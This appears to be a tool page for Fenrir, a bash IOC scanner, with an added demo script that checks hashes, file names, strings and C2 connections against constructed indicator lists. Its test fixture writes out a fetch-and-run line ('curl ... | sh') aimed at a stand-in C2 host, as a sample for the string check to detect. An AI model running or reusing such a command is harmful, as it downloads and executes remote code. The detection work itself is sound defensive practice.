Fenrir – Simple Bash Indicators of Compromise Scanner

Fenrir is a simple IOC scanner written as a bash script. It scans Linux/Unix/OSX systems for the following kinds of Indicators of Compromise (IOCs): hashes (MD5, SHA1 and SHA256, using md5sum, sha1sum, sha -a 256), file names, strings, C2 servers (checking for C2 server strings in ‘lsof -i’ and ‘lsof -i -n’ output) and a hot time frame.

Fenrir - Simple Bash IOC Scanner

What Fenrir does is:

  • Reads the IOC files
  • Takes a parameter as starting directory for the recursive walk
  • Checks C2 servers in lsof output
  • Checks for directory exclusions (configurable in the script header)
  • Checks for certain file extensions to check (configurable in the script header)
  • Checks the file name (full path) for matches in IOC files
  • Checks for file size exclusions (configurable in the script header)
  • Checks for certain strings in the file (via grep)
  • Checks for certain hash values
  • Checks for change/creation time stamp
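The list above reads like a recipe, so here is a minimal bash scanner that follows it step by step. This is an added example written for this page, not Fenrir's own code: the IOC lists, sample files, the `CHECK_EXTENSIONS` list, the size limit and the lsof-style line are all constructed here, and the time-stamp check is left out. It uses Fenrir's `value;description` line format for IOC files and prints one `MATCH` line per hit.

```bash
#!/usr/bin/env bash
# Added example, not Fenrir's own code: a minimal IOC scan following the
# feature list above. Every IOC value, path and sample file is constructed.

# --- configurable header (Fenrir keeps such settings in its script header) ---
EXCLUDE_DIRS="/proc /sys /dev"          # directories pruned from the walk
CHECK_EXTENSIONS="sh|py|pl|php|txt"     # only these get the string check (assumed list)
MAX_FILE_SIZE_KB=1024                   # bigger files skip hash and string checks

# Portable SHA256: sha256sum on Linux, shasum -a 256 on macOS.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | awk '{print $1}'
    else shasum -a 256 "$1" | awk '{print $1}'; fi
}

# Reads 'lsof -i' style output on stdin and reports lines containing a C2 IOC.
# IOC files use the "value;description" line format; only the value is matched.
check_c2() {
    local c2_iocs="$1" line c2
    while IFS= read -r line; do
        while IFS= read -r c2; do
            c2=${c2%%;*}; [ -z "$c2" ] && continue
            case "$line" in *"$c2"*) echo "MATCH c2 $c2 :: $line";; esac
        done < "$c2_iocs"
    done
    return 0
}

# Recursive walk: prints one "MATCH <type> <path> <indicator>" line per hit.
# Args: start_dir hash_iocs filename_iocs string_iocs
scan_dir() {
    local start="$1" hash_iocs="$2" name_iocs="$3" string_iocs="$4"
    local d f pat size_kb h ext s
    local prune=()
    for d in $EXCLUDE_DIRS; do prune+=( -path "$d" -prune -o ); done
    find "$start" "${prune[@]}" -type f -print 2>/dev/null | while IFS= read -r f; do
        # 1. file name check: the full path against each filename IOC
        while IFS= read -r pat; do
            pat=${pat%%;*}; [ -z "$pat" ] && continue
            case "$f" in *"$pat"*) echo "MATCH filename $f $pat";; esac
        done < "$name_iocs"
        # 2. size exclusion
        size_kb=$(( $(wc -c < "$f") / 1024 ))
        [ "$size_kb" -gt "$MAX_FILE_SIZE_KB" ] && continue
        # 3. hash check against the first field of the hash IOC list
        h=$(sha256_of "$f")
        cut -d';' -f1 "$hash_iocs" | grep -qix -- "$h" && echo "MATCH hash $f $h"
        # 4. string check (grep -F), only for the configured extensions
        ext=${f##*.}
        [[ "$ext" =~ ^($CHECK_EXTENSIONS)$ ]] || continue
        while IFS= read -r s; do
            s=${s%%;*}; [ -z "$s" ] && continue
            grep -qF -- "$s" "$f" && echo "MATCH string $f $s"
        done < "$string_iocs"
    done
    return 0
}

# Builds a throwaway tree plus IOC lists (all constructed) and prints its path.
build_fixture() {
    local base root; base=$(mktemp -d); root="$base/root"
    mkdir -p "$root/opt/app" "$root/skipme" "$root/tmp"
    printf 'echo benign\n' > "$root/opt/app/start.sh"
    printf 'print("benign")\n' > "$root/opt/app/evil_tool.py"                    # name hit
    printf 'curl -s http://c2.example.invalid/b | sh\n' > "$root/tmp/update.sh"  # string hit
    printf '%064d' 0 > "$root/tmp/dropper.bin"                                    # hash hit
    printf 'evil_tool\n' > "$root/skipme/evil_tool.txt"                           # excluded dir
    { head -c 1100000 /dev/zero; printf 'c2.example.invalid'; } > "$root/tmp/big.txt"  # too big
    printf '%s;constructed dropper\n' "$(sha256_of "$root/tmp/dropper.bin")" > "$base/hash-iocs.txt"
    printf 'evil_tool;constructed filename IOC\n' > "$base/filename-iocs.txt"
    printf 'c2.example.invalid;constructed C2 hostname\n' > "$base/string-iocs.txt"
    printf 'c2.example.invalid;constructed C2 hostname\n' > "$base/c2-iocs.txt"
    echo "$base"
}

run_demo() {
    local base; base=$(build_fixture)
    EXCLUDE_DIRS="$base/root/skipme"
    scan_dir "$base/root" "$base/hash-iocs.txt" "$base/filename-iocs.txt" "$base/string-iocs.txt"
    # constructed line standing in for one row of 'lsof -i' output
    printf 'sh 4242 root 3u IPv4 0t0 TCP host:51000->c2.example.invalid:443 (ESTABLISHED)\n' \
        | check_c2 "$base/c2-iocs.txt"
    rm -rf "$base"
}
run_demo
```

Running it prints three file hits (one per check type) plus one C2 hit, while the file in the pruned directory and the oversized file produce nothing; on a real host you would point `scan_dir` at `/` with the default exclusions and pipe live `lsof -i` and `lsof -i -n` output into `check_c2`.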

Users can look up the hash list and update it whenever a new IOC is published by a threat intelligence feed. This can be automated by subscribing to an online threat feed such as AlienVault OTX. The current hash list includes a link to the APT and the source of the IOC, whether it is Microsoft, Symantec or another vendor.

You can read more and download this tool over here: https://github.com/Neo23x0/Fenrir
